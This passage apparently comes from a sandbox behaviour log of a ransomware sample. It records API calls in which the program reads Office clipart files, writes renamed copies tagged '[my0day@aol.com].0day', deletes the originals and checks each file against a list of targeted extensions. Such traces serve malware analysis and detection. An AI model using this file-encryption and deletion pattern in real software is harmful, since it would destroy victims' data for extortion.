dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.254] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=9304) returned 1 [0269.254] CloseHandle (hObject=0x318) returned 1 [0269.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 0x20 [0269.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.255] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.255] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.255] GetLastError () returned 0x0 [0269.255] ReadFile (in: hFile=0x318, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x2458, lpOverlapped=0x0) returned 1 [0269.257] WriteFile (in: hFile=0x354, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x2460, lpOverlapped=0x0) returned 1 [0269.258] ReadFile (in: hFile=0x318, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.259] WriteFile (in: hFile=0x354, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.259] SetEndOfFile (hFile=0x354) returned 1 [0269.259] CloseHandle (hObject=0x354) returned 1 [0269.259] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.259] SetEndOfFile (hFile=0x318) returned 1 [0269.262] CloseHandle (hObject=0x318) returned 1 [0269.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf")) returned 1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.263] lstrlenW (lpString=".doc") returned 4 [0269.263] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.263] lstrlenW (lpString=".docx") returned 5 [0269.263] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.263] lstrlenW (lpString=".pdf") returned 4 [0269.263] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.263] lstrlenW (lpString=".xls") returned 4 [0269.263] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.263] lstrlenW (lpString=".xlsx") returned 5 [0269.263] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.263] lstrlenW (lpString=".ppt") returned 4 [0269.263] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.263] lstrlenW (lpString=".zip") returned 4 [0269.263] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.263] lstrlenW (lpString=".rar") returned 4 [0269.263] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.263] lstrlenW (lpString=".bz2") returned 4 [0269.263] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.263] lstrlenW (lpString=".7z") returned 3 [0269.263] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.263] lstrlenW (lpString=".dbf") returned 4 [0269.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.263] lstrlenW (lpString=".1cd") returned 4 [0269.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.264] lstrlenW (lpString=".jpg") returned 4 [0269.264] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.264] lstrlenW (lpString=".doc") returned 4 [0269.264] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString=".docx") returned 5 [0269.264] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.264] lstrlenW (lpString=".pdf") returned 4 [0269.264] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString=".xls") returned 4 [0269.264] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.264] lstrlenW (lpString=".xlsx") returned 5 [0269.264] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.264] lstrlenW (lpString=".ppt") returned 4 [0269.264] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.264] lstrlenW (lpString=".zip") returned 4 [0269.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.264] lstrlenW (lpString=".rar") returned 4 [0269.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString=".bz2") returned 4 [0269.264] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.264] lstrlenW (lpString=".7z") returned 3 [0269.264] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.474] lstrlenW (lpString=".dbf") returned 4 [0269.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.474] lstrlenW (lpString=".1cd") returned 4 [0269.474] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 63 [0269.474] lstrlenW (lpString=".jpg") returned 4 [0269.474] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.474] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.474] lstrlenW (lpString="BL00267_.WMF") returned 12 [0269.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.502] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2644) returned 1 [0269.502] CloseHandle (hObject=0x354) returned 1 [0269.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 0x20 [0269.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.539] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.539] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0269.559] GetLastError () returned 0x0 [0269.559] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xa54, lpOverlapped=0x0) returned 1 [0269.562] WriteFile (in: hFile=0x1fc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xa60, lpOverlapped=0x0) returned 1 [0269.564] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.564] WriteFile (in: hFile=0x1fc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.564] SetEndOfFile (hFile=0x1fc) returned 1 [0269.564] CloseHandle (hObject=0x1fc) returned 1 [0269.564] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.564] SetEndOfFile (hFile=0x2cc) returned 1 [0269.571] CloseHandle (hObject=0x2cc) returned 1 [0269.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 1 [0269.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.579] lstrlenW (lpString=".doc") returned 4 [0269.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString=".docx") returned 5 [0269.580] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.580] lstrlenW (lpString=".pdf") returned 4 [0269.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString=".xls") returned 4 [0269.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.580] lstrlenW (lpString=".xlsx") returned 5 [0269.580] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.580] lstrlenW (lpString=".ppt") returned 4 [0269.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.580] lstrlenW (lpString=".zip") returned 4 [0269.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.580] lstrlenW (lpString=".rar") returned 4 [0269.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString=".bz2") returned 4 [0269.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString=".7z") returned 3 [0269.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.580] lstrlenW (lpString=".dbf") returned 4 [0269.580] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.580] lstrlenW (lpString=".1cd") returned 4 [0269.580] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.580] lstrlenW (lpString=".jpg") returned 4 [0269.580] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.580] lstrlenW (lpString=".doc") returned 4 [0269.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString=".docx") returned 5 [0269.581] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.581] lstrlenW (lpString=".pdf") returned 4 [0269.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString=".xls") returned 4 [0269.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.581] lstrlenW (lpString=".xlsx") returned 5 [0269.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.581] lstrlenW (lpString=".ppt") returned 4 [0269.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.581] lstrlenW (lpString=".zip") returned 4 [0269.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.581] lstrlenW (lpString=".rar") returned 4 [0269.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString=".bz2") returned 4 [0269.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString=".7z") returned 3 [0269.581] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.581] lstrlenW (lpString=".dbf") returned 4 [0269.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.581] lstrlenW (lpString=".1cd") returned 4 [0269.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0269.581] lstrlenW (lpString=".jpg") returned 4 [0269.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.582] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.582] lstrlenW (lpString="BL00270_.WMF") returned 12 [0269.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.583] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=3016) returned 1 [0269.583] CloseHandle (hObject=0x2c4) returned 1 [0269.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 0x20 [0269.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.583] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.583] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.584] GetLastError () returned 0x0 [0269.584] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xbc8, lpOverlapped=0x0) returned 1 [0269.586] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.587] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.587] SetEndOfFile (hFile=0x380) returned 1 [0269.587] CloseHandle (hObject=0x380) returned 1 [0269.587] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.587] SetEndOfFile (hFile=0x2c4) returned 1 [0269.590] CloseHandle (hObject=0x2c4) returned 1 [0269.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 1 [0269.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.590] lstrlenW (lpString=".doc") returned 4 [0269.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.590] lstrlenW (lpString=".docx") returned 5 [0269.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.590] lstrlenW (lpString=".pdf") returned 4 [0269.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.590] lstrlenW (lpString=".xls") returned 4 [0269.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.590] lstrlenW (lpString=".xlsx") returned 5 [0269.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.591] lstrlenW (lpString=".ppt") returned 4 [0269.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.591] lstrlenW (lpString=".zip") returned 4 [0269.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.591] lstrlenW (lpString=".rar") returned 4 [0269.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString=".bz2") returned 4 [0269.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString=".7z") returned 3 [0269.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.591] lstrlenW (lpString=".dbf") returned 4 [0269.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.591] lstrlenW (lpString=".1cd") returned 4 [0269.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.591] lstrlenW (lpString=".jpg") returned 4 [0269.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.591] lstrlenW (lpString=".doc") returned 4 [0269.591] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString=".docx") returned 5 [0269.591] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.591] lstrlenW (lpString=".pdf") returned 4 [0269.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.591] lstrlenW (lpString=".xls") returned 4 [0269.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.591] lstrlenW (lpString=".xlsx") returned 5 [0269.591] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.591] lstrlenW (lpString=".ppt") returned 4 [0269.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.592] lstrlenW (lpString=".zip") returned 4 [0269.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.592] lstrlenW (lpString=".rar") returned 4 [0269.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.592] lstrlenW (lpString=".bz2") returned 4 [0269.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.592] lstrlenW (lpString=".7z") returned 3 [0269.592] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.592] lstrlenW (lpString=".dbf") returned 4 [0269.592] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.592] lstrlenW (lpString=".1cd") returned 4 [0269.592] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0269.592] lstrlenW (lpString=".jpg") returned 4 [0269.592] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.592] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.592] lstrlenW (lpString="BL00273_.WMF") returned 12 [0269.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.593] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=3780) returned 1 [0269.593] CloseHandle (hObject=0x2c4) returned 1 [0269.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 0x20 [0269.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.593] 